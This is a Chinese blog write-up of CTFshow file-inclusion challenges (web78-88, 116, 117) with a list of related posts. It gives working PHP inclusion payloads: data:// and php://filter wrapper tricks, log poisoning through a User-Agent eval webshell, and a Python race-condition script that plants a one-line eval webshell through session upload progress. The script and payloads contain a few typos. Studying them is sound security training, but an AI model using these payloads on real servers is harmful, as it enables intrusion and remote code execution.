CTFshow 文件包含 web78-88 116 117

于 2024-08-05 16:45:50 发布
阅读量1k 收藏 28
点赞数 21
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/potatojiang/article/details/140905670
版权

web 78

这里没有什么过滤

?file=data://text/plain,<?php system('tac flag.php');?>

web 79

把php替换为???

这里会影响filter,对data没有影响

用短标签绕过过滤

?file=data://text/plain,<?=eval($_PPOST[1];?>

1=system("tac flag.php");

web 80

data和php别过滤了

我们尝试包含日志

首先我们在user agent里面写入

<?=eval($_POST[1]);?>

然后

?file=/var/log/nginx/access.log

1=system('cat fl0g.php');

web 81

和上一题基本一致

web 82

这次多过滤了.以及:,只能包含无后缀的文件

而我们饿session文件没有后缀

控制文件内容是

PHP_SESSION_UPLOAD_PROGRESS获取实时文件上传进度,利用这个函数将内容写在文件中去

ctfshow学习记录-web入门(文件包含78-87)_ctfshow web87-CSDN博客

import requests
import io
import threading

url='http://9a77fcb3-6f3c-4bd6-a247-07bfe6766509.challenge.ctf.show:8080/'
sessionid='ctfshow'
data={
	"1":"file_put_contents('/var/www/html/jiuzhen.php','<?php eval($_POST[3]);?>');"
}
#这个是访问/tmp/sess_ctfshow时,post传递的内容,是在网站目录下写入一句话木马。这样一旦访问成功,就可以蚁剑连接了。
def write(session):#/tmp/sess_ctfshow中写入一句话木马。
	fileBytes = io.BytesIO(b'a'*1024*50)
	while True:
		response=session.post(url,
			data={
			'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'
			},
			cookies={
			'PHPSESSID':sessionid
			},
			files={
			'file':('ctfshow.jpg',fileBytes)
			}
			)

def read(session):#访问/tmp/sess_ctfshow,post传递信息,在网站目录下写入木马。
	while True:
		response=session.post(url+'?file=/tmp/sess_'+sessionid,data=data,
			cookies={
			'PHPSESSID':sessionid
			}
			)
		resposne2=session.get(url+'jiuzhen.php');#访问木马文件,如果访问到了就代表竞争成功
		if resposne2.status_code==200:了
			print('++++++done++++++')
		else:
			print(resposne2.status_code)

if __name__ == '__main__':

	evnet=threading.Event()
	#写入和访问分别设置5个线程。
	with requests.session() as session:
		for i in range(5):
			threading.Thread(target=write,args=(session,)).start()
		for i in range(5):
			threading.Thread(target=read,args=(session,)).start()

	evnet.set()

这里用到了条件竞争以及session的利用

CTF | 天下武功唯快不破之条件竞争漏洞 - FreeBuf网络安全行业门户

session利用的小思路 - 先知社区 (aliyun.com)

web 83

这里首先把session给销毁了再包含

上一个脚本还能用

web 84

这题在包含之间把临时文件删除

我们的上一个脚本还可以。

相当我我们删除之后又写进去了。在单线程是安全的,但多线程就不安全了

web 85

先确认文件存在,检测有没<,在把文件包含。上一题还可以用

web 86

定义了一个包含路径,上一个脚本还可以跑通

web 87

这题使用伪协议的过滤器

?file=php://fiter/write=convert.base64-encode/resource=2.php

filter——使用过滤器

convert.base64-encodet——对写的内容进行编码

content=<?php @eval($_POST[y]);?>

这里我们需要注意的是我们的php://fiter/write=convert.base64-encode/resource=2.php需要进行两次url编码,而对我们的<?php @eval($_POST[y]);?>需要进行一次base64编码,由于base64编码范围的原因<?php die('大佬别秀了');?>会被过滤为phpdie为6个,需要加上任意2个在base64范围内的字符即可,所以

file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%32%25%32%65%25%37%30%25%36%38%25%37%30

content=aaPD9waHAgQGV2YWwoJF9QT1NUW3ldKTs/Pg==

然后访问2.php

y=system('tac f*.php'); 

web 88

由于没有过滤:,所以使用data协议

?file=data://text/plain;base64,<?php system('tac *.php');?>

但是要使用base64编码,编码后不能有+ = 所以我们不断填充字符来去掉。

参考payload

?file=data://text/plain;base64,<?php system('tac *.php');?>aa
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/PmFh

web 116

老师上课的时候交了一点misc

把视频下载下来,用010打开

发现一个png文件,保存下来

这应该就是源代码

我们直接打开

?file=flag.php

通过抓包发现flag在返回包里,只是在浏览器中看不到

web 117

依旧是要绕过file_put_contents($file, "<?php die();?>".$contents);

这里与87相同,只是base64,rot13等被禁用了,发现convert.iconv.可用

payload

?file=php://filter/write=convert.iconv,UCS-2LE.UCS-2BE/resource=a.php

contents=?<hp pvela$(P_SO[T]1;)>?

1=system('tac flag.php')

potatojiang
关注
[CTFSHOW]文件包含78-88
Huamang的博客
03-07 552
web 78 php伪协议 payload: file=php://filter/read=convert.base64-encode/resource=flag.php web 79 data协议,用base64编码绕过过滤 payload: file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
CTFshow web入门web82-文件包含5
weixin_74336671的博客
12-06 648
因为有die(与exit意思一样),导致即使我们成功写入一句话,也执行不了(这个过程在实战中十分常见,通常出现在缓存、配置文件等等地方,不允许用户直接访问的文件,都会被加上if(!$file是我们我们可控的协议流,我们使用base64编码,在解码时去掉退出代码中不支持的字符,变为phpdie,在后面加上aa使得能正常解码phpdieaa(base64编码解码特性,4字节一组)file_put_contents(urldecode($file), "<?php die('大佬别秀了');
CTFshow 文件包含 web78
Kradress的博客
12-07 127
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 10:52:43 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 10:54:20 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
CTFshow_web入门_文件包含_web78-
weixin_43896504的博客
07-22 425
文件包含
CTFshow 文件包含Web78-Web117
最新发布
dasdasdasvsdV的博客
08-04 314
注意用法,allow_url_fopen和allow_url_include都满足的时候才可以用常用场景:文件包含、文本包含。
CTFSHOW WEB入门 文件包含 web78-
sinat_41572027的博客
07-11 828
CTFSHOW WEB入门 文件包含 web78.79.80.81.87.88.116.117
ctfshow-web78(文件包含)
m0_62094846的博客
01-11 1267
if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?file=php://filter/read=convert.base64-encode/resource=flag.php
ctfshow 文件包含Web78-79
m0_62584974的博客
04-15 1878
Ctfshow文件包含漏洞Web78 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。 Web78 考察php伪协议 php://伪协议:php://伪协议是PHP提供的一些输人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,.
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
CTFshow 文件包含 web116
Kradress的博客
12-12 823
目录源码思路题解总结 源码 下载视频用winhex分离出png 思路 可以正常读文件 题解 直接跑字典 总结 水题
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 844
文件包含之php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
【CTFshow】文件包含web78-web81
weixin_51614272的博客
02-25 4721
文件包含web78-web81web78web79php://input伪协议data协议web80php://input伪协议日志包含绕过web81web82(没完全理解) web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 看到源码中的include函数,这个表示从外部引入php文件并执行,如果执行不成功,就返回文件的
ctfshow学习记录-web入门(文件包含78-87)
龟速更新的九某人
07-04 1771
ctfshow学习记录-web入门(文件包含web78-87)
[ctfshow]web入门文件包含78-88
L1ni01
12-04 2720
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
ctfshow web入门 文件包含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 7326
个人ctfshow刷题记录
CTFshow web入门web78-文件包含1
weixin_74336671的博客
11-28 133
的攻击数据读取文件,拿到各种文件的。通过分析,此处未进行任何的过滤。利用Filter机制,构造。将flag提交结束!
ctfshow-web入门-文件包含web78web79、web80、web81)
Welcome To Myon'Blog !
07-04 1607
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。会将我们输入的 php 替换为问号?
ctfshow-web-web红包题
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛中的Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目中的具体情况来确定。在CTF比赛中,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛中的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值